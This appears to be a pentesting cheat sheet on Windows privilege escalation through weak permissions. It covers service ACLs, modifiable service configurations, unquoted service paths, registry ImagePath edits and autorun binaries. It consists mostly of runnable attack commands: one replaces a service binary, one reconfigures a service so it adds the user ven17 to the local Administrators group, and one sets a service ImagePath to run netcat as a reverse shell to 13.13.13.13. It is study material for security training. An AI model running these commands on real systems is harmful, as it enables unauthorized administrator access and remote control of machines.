Weak Permissions
Here would be an examples of weak permissions abuse
Permissive File System ACLs
Running SharpUp
Tool: SharpUp from GhostPack to check for weak ACLs.
PS C:\> .\SharpUp.exe audit
Example vulnerable service:
Name: SecurityService
Path:
"C:\Program Files (x86)\PCProtect\SecurityService.exe"
Checking Permissions with icacls
icacls
PS C:\> icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"
Output shows
Everyone
andBUILTIN\Users
haveFull Control
.
Replacing Service Binary with malicious one
C:\> cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"
C:\> sc start SecurityService
Replace with a malicious binary to gain SYSTEM privileges.
Weak Service Permissions
Checking Modifiable Services with SharpUp
C:\> SharpUp.exe audit
Example vulnerable service:
Name: WindscribeService
Path:
"C:\Program Files (x86)\Windscribe\WindscribeService.exe"
Checking Permissions with accesschk
accesschk
C:\> accesschk.exe /accepteula -quvcw WindscribeService
NT AUTHORITY\Authenticated Users
hasSERVICE_ALL_ACCESS
(full control).
Changing the Service Binary Path
C:\> sc config WindscribeService binpath="cmd /c net localgroup administrators ven17 /add"
Grants user
ven17
administrator rights.
Stopping & Starting the Service
C:\> sc stop WindscribeService
C:\> sc start WindscribeService
Executes the new binary path.
Confirming Privilege Escalation
C:\> net localgroup administrators
Verify if
ven17
was added to the Administrators group.
Resetting the Binary Path (Cleanup)
C:\> sc config WindscribeService binpath="c:\Program Files (x86)\Windscribe\WindscribeService.exe"
C:\> sc start WindscribeService
C:\> sc query WindscribeService
Unquoted Service Path
If a service binary path is not enclosed in quotes, Windows may execute unintended binaries.
Example vulnerable service:
C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe
Windows may execute:
C:\Program.exe
C:\Program Files\System.exe
Finding Unquoted Service Paths
C:\> wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
Permissive Registry ACLs
Checking for Weak Service ACLs in the Registry
C:\> accesschk.exe /accepteula "ven17" -kvuqsw hklm\System\CurrentControlSet\services
Example vulnerable service: ModelManagerService
Allows modification of the
ImagePath
.
Changing ImagePath
with PowerShell
ImagePath
with PowerShellPS C:\> Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\ven17\Downloads\nc.exe -e cmd.exe 13.13.13.13 443"
Executes Netcat shell upon service start.
Modifiable Registry Autorun Binaries
Checking Startup Programs
PS C:\> Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl
If the attacker can modify a startup binary, they can execute malicious code on user login.